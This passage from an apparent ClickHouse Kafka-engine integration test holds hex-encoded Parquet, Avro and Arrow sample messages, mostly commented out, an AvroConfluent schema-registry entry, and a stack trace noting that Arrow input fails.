# # '\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # ''
# # ],
# },
# 'Avro' : {
# 'data_sample' : [
# '\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0',
# '\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a\x1e\xac\x02\x02\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x04\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x06\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x08\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x10\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x12\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x14\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x16\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x18\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a',
# '\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f',
# ],
# },
'AvroConfluent' : {
'data_sample': [
avro_confluent_message(cluster.schema_registry_client, {'id':0L,'blockNo':0,'val1':unicode('AM'),'val2':0.5,"val3":1}),
''.join(map(lambda id: avro_confluent_message(cluster.schema_registry_client, {'id':id,'blockNo':0,'val1':unicode('AM'),'val2':0.5,"val3":1}), range(1,16))),
avro_confluent_message(cluster.schema_registry_client, {'id':0L,'blockNo':0,'val1':unicode('AM'),'val2':0.5,"val3":1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
cluster.schema_registry_host,
cluster.schema_registry_port
),
'supports_empty_value': True,
}
# 'Arrow' : {
# # Not working at all: DB::Exception: Error while opening a table: Invalid: File is too small: 0, Stack trace (when copying this message, always include the lines below):
# # /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:107: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de010df in /usr/bin/clickhouse
# 'data_sample' : [
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\